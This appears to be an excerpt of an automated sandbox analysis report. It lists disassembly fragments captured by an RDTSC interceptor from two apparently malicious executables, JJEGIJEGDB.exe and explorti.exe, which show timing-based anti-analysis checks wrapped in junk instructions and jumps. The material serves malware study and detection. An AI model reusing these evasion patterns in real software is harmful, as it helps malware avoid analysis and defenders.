                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5360A84 second address: 5360ADC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, 33h 0x00000005 mov dx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c jmp 00007F34D8F44CC4h 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push ebx 0x00000016 pop ecx 0x00000017 pushfd 0x00000018 jmp 00007F34D8F44CC9h 0x0000001d xor ax, CBE6h 0x00000022 jmp 00007F34D8F44CC1h 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5360ADC second address: 5360AEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D94219DCh 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5360AEC second address: 5360B03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esp, ebp 0x0000000a pushad 0x0000000b mov dl, B7h 0x0000000d popad 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov bx, si 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5360B03 second address: 5360B08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C1F150 second address: C1F156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C1F156 second address: C1F15A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5370D90 second address: 5370D94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5370D94 second address: 5370D9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5370D9A second address: 5370DA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5370DA0 second address: 5370DA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5370B0B second address: 5370B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xchg eax, ebp 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5370B17 second address: 5370B1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53F07E4 second address: 53F07EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53F07EA second address: 53F07F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D94219DBh 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53F07F9 second address: 53F07FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53E0903 second address: 53E0926 instructions: 0x00000000 rdtsc 0x00000002 mov si, FFEDh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 mov ax, 950Fh 0x0000000d push ecx 0x0000000e pop edx 0x0000000f popad 0x00000010 popad 0x00000011 mov dword ptr [esp], ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F34D94219DDh 0x0000001b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53E0926 second address: 53E092C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53E092C second address: 53E0930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53E0730 second address: 53E074A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53E074A second address: 53E0752 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5380270 second address: 5380280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D8F44CBBh 0x00000009 popad 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5380280 second address: 5380286 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5380286 second address: 5380295 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5380295 second address: 53802A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53802A8 second address: 53802C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D8F44CC4h 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53802C0 second address: 53802C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53802C4 second address: 5380316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F34D8F44CC7h 0x0000000e mov ebp, esp 0x00000010 jmp 00007F34D8F44CC6h 0x00000015 pop ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F34D8F44CC7h 0x0000001d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5380316 second address: 538032E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D94219E4h 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 538032E second address: 5380332 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53E0B82 second address: 53E0B88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53E0B88 second address: 53E0B99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D8F44CBDh 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53E0B99 second address: 53E0BAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov esi, edi 0x0000000e movsx edx, si 0x00000011 popad 0x00000012 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53E0BAB second address: 53E0C03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F34D8F44CC3h 0x00000009 or cx, 5B2Eh 0x0000000e jmp 00007F34D8F44CC9h 0x00000013 popfd 0x00000014 mov ax, A9B7h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov dword ptr [esp], ebp 0x0000001e jmp 00007F34D8F44CBAh 0x00000023 mov ebp, esp 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 movsx ebx, cx 0x0000002b mov esi, 6AE800B5h 0x00000030 popad 0x00000031 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53E0C03 second address: 53E0C15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D94219DEh 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53E0C15 second address: 53E0C73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F34D8F44CBDh 0x00000012 xor esi, 58B8EB76h 0x00000018 jmp 00007F34D8F44CC1h 0x0000001d popfd 0x0000001e pushad 0x0000001f movzx eax, di 0x00000022 mov cx, di 0x00000025 popad 0x00000026 popad 0x00000027 push dword ptr [ebp+08h] 0x0000002a jmp 00007F34D8F44CC5h 0x0000002f push 8F073FA1h 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53E0C73 second address: 53E0C77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53E0C77 second address: 53E0C8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53E0CD2 second address: 53E0CF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 mov ebx, 12F808CEh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d movzx eax, al 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F34D94219E0h 0x00000017 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53E0CF4 second address: 53E0D28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F34D8F44CC1h 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F34D8F44CC5h 0x00000017 popad 0x00000018 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53906AF second address: 53906E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F34D94219E3h 0x00000015 popad 0x00000016 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53906E0 second address: 53906E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53906E6 second address: 5390712 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F34D94219DEh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 call 00007F34D94219DDh 0x00000017 pop esi 0x00000018 mov dh, 11h 0x0000001a popad 0x0000001b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5390712 second address: 53907BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 mov bx, E218h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e jmp 00007F34D8F44CC7h 0x00000013 push FFFFFFFEh 0x00000015 jmp 00007F34D8F44CC6h 0x0000001a push 1A6ECFD3h 0x0000001f pushad 0x00000020 push ebx 0x00000021 pushfd 0x00000022 jmp 00007F34D8F44CBAh 0x00000027 add ax, 66D8h 0x0000002c jmp 00007F34D8F44CBBh 0x00000031 popfd 0x00000032 pop esi 0x00000033 mov edx, 0543F41Ch 0x00000038 popad 0x00000039 xor dword ptr [esp], 6C970FCBh 0x00000040 jmp 00007F34D8F44CBBh 0x00000045 push 2C094DD9h 0x0000004a jmp 00007F34D8F44CBFh 0x0000004f xor dword ptr [esp], 5AF9E3D9h 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F34D8F44CC5h 0x0000005d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53907BD second address: 53907EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000000h] 0x0000000f jmp 00007F34D94219DEh 0x00000014 nop 0x00000015 pushad 0x00000016 mov edi, ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a mov dx, si 0x0000001d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53907EF second address: 5390812 instructions: 0x00000000 rdtsc 0x00000002 mov di, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007F34D8F44CC1h 0x0000000e nop 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov cx, 1BA5h 0x00000016 popad 0x00000017 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5390812 second address: 5390843 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 1Ch 0x0000000c jmp 00007F34D94219E6h 0x00000011 xchg eax, ebx 0x00000012 pushad 0x00000013 movzx eax, di 0x00000016 push eax 0x00000017 push edx 0x00000018 mov eax, ebx 0x0000001a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5390843 second address: 539089C instructions: 0x00000000 rdtsc 0x00000002 movsx ebx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a mov cx, di 0x0000000d pushfd 0x0000000e jmp 00007F34D8F44CC9h 0x00000013 xor ch, FFFFFFB6h 0x00000016 jmp 00007F34D8F44CC1h 0x0000001b popfd 0x0000001c popad 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 call 00007F34D8F44CC3h 0x00000026 pop esi 0x00000027 mov si, dx 0x0000002a popad 0x0000002b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 539089C second address: 53908A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53908A3 second address: 53908BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, esi 0x00000008 jmp 00007F34D8F44CBAh 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53908BB second address: 53908BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53908BF second address: 53908E4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, esi 0x00000008 jmp 00007F34D8F44CC2h 0x0000000d xchg eax, edi 0x0000000e pushad 0x0000000f mov eax, 5FB0412Dh 0x00000014 push eax 0x00000015 push edx 0x00000016 mov ebx, eax 0x00000018 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53908E4 second address: 53909C9 instructions: 0x00000000 rdtsc 0x00000002 mov di, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F34D94219E7h 0x00000010 add ax, 340Eh 0x00000015 jmp 00007F34D94219E9h 0x0000001a popfd 0x0000001b mov ah, 65h 0x0000001d popad 0x0000001e xchg eax, edi 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F34D94219E9h 0x00000026 adc ch, FFFFFFF6h 0x00000029 jmp 00007F34D94219E1h 0x0000002e popfd 0x0000002f pushfd 0x00000030 jmp 00007F34D94219E0h 0x00000035 or cx, 0818h 0x0000003a jmp 00007F34D94219DBh 0x0000003f popfd 0x00000040 popad 0x00000041 mov eax, dword ptr [76FBB370h] 0x00000046 jmp 00007F34D94219E6h 0x0000004b xor dword ptr [ebp-08h], eax 0x0000004e pushad 0x0000004f mov dx, ax 0x00000052 mov di, si 0x00000055 popad 0x00000056 xor eax, ebp 0x00000058 jmp 00007F34D94219E5h 0x0000005d nop 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007F34D94219DDh 0x00000065 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53909C9 second address: 5390A01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov si, di 0x0000000e push edx 0x0000000f push esi 0x00000010 pop ebx 0x00000011 pop ecx 0x00000012 popad 0x00000013 nop 0x00000014 pushad 0x00000015 push eax 0x00000016 movsx edi, si 0x00000019 pop eax 0x0000001a popad 0x0000001b lea eax, dword ptr [ebp-10h] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F34D8F44CBCh 0x00000025 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5390A01 second address: 5390A4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F34D94219E1h 0x00000009 add ecx, 69D69F36h 0x0000000f jmp 00007F34D94219E1h 0x00000014 popfd 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr fs:[00000000h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F34D94219E3h 0x00000027 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5390A4E second address: 5390A7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov esi, dword ptr [ebp+08h] 0x0000000d jmp 00007F34D8F44CC7h 0x00000012 mov eax, dword ptr [esi+10h] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5390A7B second address: 5390A7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5390A7F second address: 5390A9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5390A9A second address: 5390B81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 push edi 0x00000007 pop eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d jmp 00007F34D94219DDh 0x00000012 jne 00007F354AF50C46h 0x00000018 pushad 0x00000019 movzx esi, dx 0x0000001c push edi 0x0000001d mov ecx, 75F1CCCBh 0x00000022 pop ecx 0x00000023 popad 0x00000024 mov eax, 00000000h 0x00000029 jmp 00007F34D94219DCh 0x0000002e mov dword ptr [ebp-20h], eax 0x00000031 jmp 00007F34D94219E0h 0x00000036 mov ebx, dword ptr [esi] 0x00000038 pushad 0x00000039 movzx ecx, di 0x0000003c pushfd 0x0000003d jmp 00007F34D94219E3h 0x00000042 or cx, DF4Eh 0x00000047 jmp 00007F34D94219E9h 0x0000004c popfd 0x0000004d popad 0x0000004e mov dword ptr [ebp-24h], ebx 0x00000051 jmp 00007F34D94219DEh 0x00000056 test ebx, ebx 0x00000058 jmp 00007F34D94219E0h 0x0000005d je 00007F354AF50B0Ch 0x00000063 jmp 00007F34D94219E0h 0x00000068 cmp ebx, FFFFFFFFh 0x0000006b pushad 0x0000006c push eax 0x0000006d push edx 0x0000006e pushfd 0x0000006f jmp 00007F34D94219DCh 0x00000074 or cx, 6958h 0x00000079 jmp 00007F34D94219DBh 0x0000007e popfd 0x0000007f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5390B81 second address: 53906AF instructions: 0x00000000 rdtsc 0x00000002 mov di, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 movzx eax, bx 0x0000000a popad 0x0000000b jmp 00007F354AA73DA5h 0x00000010 jne 00007F34D8F44CD9h 0x00000012 xor ecx, ecx 0x00000014 mov dword ptr [esi], ecx 0x00000016 mov dword ptr [esi+04h], ecx 0x00000019 mov dword ptr [esi+08h], ecx 0x0000001c mov dword ptr [esi+0Ch], ecx 0x0000001f mov dword ptr [esi+10h], ecx 0x00000022 mov dword ptr [esi+14h], ecx 0x00000025 mov ecx, dword ptr [ebp-10h] 0x00000028 mov dword ptr fs:[00000000h], ecx 0x0000002f pop ecx 0x00000030 pop edi 0x00000031 pop esi 0x00000032 pop ebx 0x00000033 mov esp, ebp 0x00000035 pop ebp 0x00000036 retn 0004h 0x00000039 nop 0x0000003a pop ebp 0x0000003b ret 0x0000003c add esi, 18h 0x0000003f pop ecx 0x00000040 cmp esi, 00A755E8h 0x00000046 jne 00007F34D8F44CA0h 0x00000048 push esi 0x00000049 call 00007F34D8F45523h 0x0000004e push ebp 0x0000004f mov ebp, esp 0x00000051 push dword ptr [ebp+08h] 0x00000054 call 00007F34DD8A8470h 0x00000059 mov edi, edi 0x0000005b pushad 0x0000005c pushad 0x0000005d mov bl, ch 0x0000005f jmp 00007F34D8F44CC7h 0x00000064 popad 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007F34D8F44CC6h 0x0000006c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5390200 second address: 539020F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 539020F second address: 539025C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 1FB4611Ah 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F34D8F44CBCh 0x00000011 push eax 0x00000012 jmp 00007F34D8F44CBBh 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F34D8F44CC6h 0x0000001d mov ebp, esp 0x0000001f pushad 0x00000020 call 00007F34D8F44CBDh 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 1FEE45 second address: 1FE700 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 ja 00007F34D94219DCh 0x0000000b popad 0x0000000c nop 0x0000000d jmp 00007F34D94219DEh 0x00000012 push dword ptr [ebp+122D0019h] 0x00000018 or dword ptr [ebp+122D1870h], ebx 0x0000001e call dword ptr [ebp+122D265Bh] 0x00000024 pushad 0x00000025 mov dword ptr [ebp+122D1870h], esi 0x0000002b xor eax, eax 0x0000002d sub dword ptr [ebp+122D2154h], ebx 0x00000033 mov edx, dword ptr [esp+28h] 0x00000037 jmp 00007F34D94219E9h 0x0000003c mov dword ptr [ebp+122D33DDh], eax 0x00000042 pushad 0x00000043 xor dl, FFFFFFB5h 0x00000046 jmp 00007F34D94219DCh 0x0000004b popad 0x0000004c mov esi, 0000003Ch 0x00000051 sub dword ptr [ebp+122D2154h], edx 0x00000057 add esi, dword ptr [esp+24h] 0x0000005b jne 00007F34D94219DCh 0x00000061 lodsw 0x00000063 je 00007F34D94219DDh 0x00000069 jnc 00007F34D94219D7h 0x0000006f add eax, dword ptr [esp+24h] 0x00000073 pushad 0x00000074 add dword ptr [ebp+122D2154h], eax 0x0000007a adc ch, FFFFFFBCh 0x0000007d popad 0x0000007e mov ebx, dword ptr [esp+24h] 0x00000082 stc 0x00000083 nop 0x00000084 jmp 00007F34D94219E3h 0x00000089 push eax 0x0000008a jng 00007F34D94219E8h 0x00000090 push eax 0x00000091 push edx 0x00000092 je 00007F34D94219D6h 0x00000098 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 36B0F9 second address: 36B0FF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
